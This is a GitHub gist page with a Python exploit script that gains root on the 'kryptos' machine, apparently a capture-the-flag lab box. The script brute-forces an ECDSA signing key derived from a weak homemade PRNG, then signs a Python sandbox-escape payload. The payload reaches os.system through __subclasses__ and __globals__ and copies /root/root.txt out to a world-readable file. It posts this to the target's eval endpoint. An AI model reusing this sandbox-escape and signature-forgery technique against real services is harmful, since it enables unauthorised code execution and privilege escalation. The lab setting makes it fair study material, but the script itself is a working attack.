-
-
Save xct/3ba93f758fc07a0ca5b5dde66177e6ea to your computer and use it in GitHub Desktop.
Getting root access on kryptos by abusing weak prng and python reflection
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import random | |
import json | |
import hashlib | |
import binascii | |
from ecdsa import VerifyingKey, SigningKey, NIST384p | |
from bottle import route, run, request, debug | |
from bottle import hook | |
from bottle import response as resp | |
import sys | |
import requests | |
def secure_rng(seed): | |
# Taken from the internet - probably secure | |
p = 2147483647 | |
g = 2255412 | |
keyLength = 32 | |
ret = 0 | |
ths = round((p-1)/2) | |
for i in range(keyLength*8): | |
seed = pow(g,seed,p) | |
if seed > ths: | |
ret += 2**i | |
return ret | |
def verify(msg, sig): | |
try: | |
return vk.verify(binascii.unhexlify(sig), msg) | |
except: | |
return False | |
def sign(msg): | |
return binascii.hexlify(sk.sign(msg)) | |
print "[+] Signing expression.." | |
expr = "[x for x in (1).__class__.__base__.__subclasses__() if x.__name__ == 'Pattern'][0].__init__.__globals__['__builtins__']['__import__']('os').system('cp /root/root.txt /tmp/xct && chmod 777 /tmp/xct')" | |
proxies = {'http': "http://localhost:9090"} | |
response = 'Bad signature' | |
print "Bruting.." | |
while response == 'Bad signature': | |
seed = random.getrandbits(128) | |
rand = secure_rng(seed) + 1 | |
sk = SigningKey.from_secret_exponent(rand, curve=NIST384p) | |
vk = sk.get_verifying_key() | |
sig = sign(expr) | |
r = requests.post('http://127.0.0.1:81/eval', json={'expr': expr, 'sig': sig}, proxies=proxies) | |
response = r.text | |
print r.text | |
print seed |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment